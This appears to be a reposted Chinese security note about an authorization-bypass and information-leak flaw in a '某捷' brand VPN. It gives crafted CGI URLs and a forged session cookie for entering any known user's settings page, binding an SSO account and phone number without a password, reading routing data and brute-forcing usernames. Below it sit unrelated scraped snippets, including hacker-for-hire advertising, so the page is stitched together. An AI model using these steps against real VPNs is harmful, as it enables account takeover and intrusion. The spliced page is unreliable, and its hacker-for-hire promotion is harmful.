0x01 简述
HVV临近,现预警一个某捷VPN的信息泄露及越权绑定SSO账号及手机号的问题
注:需要知道存在的VPN用户,当然如果不知道的话,可以使用文章后面的那个 *** 进行用户名爆破
话不多说先上图
0x02 越权绑定
首先打开VPN登录页,可以看到是这样子的
直接构造URL:
https://1.1.1.1/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=USERNAME&sid=1614345312&oper=showres
USERNAME为已存在的用户名,访问后即可进入到这样一个界面
然后我们点击左侧的“个人设置”
在如上图功能这里,没有任何密码验证,可以直接给这个用户绑定SSO账号及手机号
0x03?信息泄露
直接构造URL:
https://1.1.1.1/cgi-bin/main.cgi?oper=getrsc
注:需要先使用之一步的方式构造URL进入到设置页面,否则没有Cookie,会提示“错误:当前用户不在线,请重新登录”,当然你也可以手动构造Cookie
Cookie: UserName=USERNAME; SessionId=1614345312; FirstVist=1; Skin=1; tunnel=1
然后再打开的页面,就可以看到他VPN现有的路由信息
同时,通过Burp抓包可以发现,如果用户名是正确的,这个页面才会返回路由信息
如果用户是不存在的,就不会返回
通过这个 *** ,可以使用Burp进行用户名爆破
文章来源微信公众号:NearSec
摆地摊卖童装真能日赚1000元以上吗?答案是肯定的,怎样才能做到日赚千元以上呢? 看下面这位摆摊卖童装的摊位,明白人一看就能看懂了 看她的货是怎么摆放的?很多人卖童装是一款只摆出一件来,稀稀拉...
职场女性励志群像电视剧《正青春》正在热播中,该剧通过对女性的职场之路进行细致描绘,展现女性群体在职场中遭遇的困难与波折,表达出不屈不挠的专业精神。王秀竹饰演的董欣然,拥有靓丽外表的同时,还秉持着清醒的...
战争时代黑客模式(帝国时代5全面战争)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客...
黑客武林网站是多少(黑客武林论坛)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业务...
本文导读目录: 1、中国十大Hacker组织? 2、黑客组织的名字 3、世界上著名的黑客组织有哪些?(不包括匿名者) 4、世界最大黑客组织是好人吗? 5、世界黑客排名是怎样的? 6...
关于crossdomain.xml装备不妥的损害许多文章现已说的很清楚了。 可是怎么运用这个缝隙,怎样写一个exploit来证明缝隙确一向没有很好的材料。 直到2013年8月 Gursev Kalra...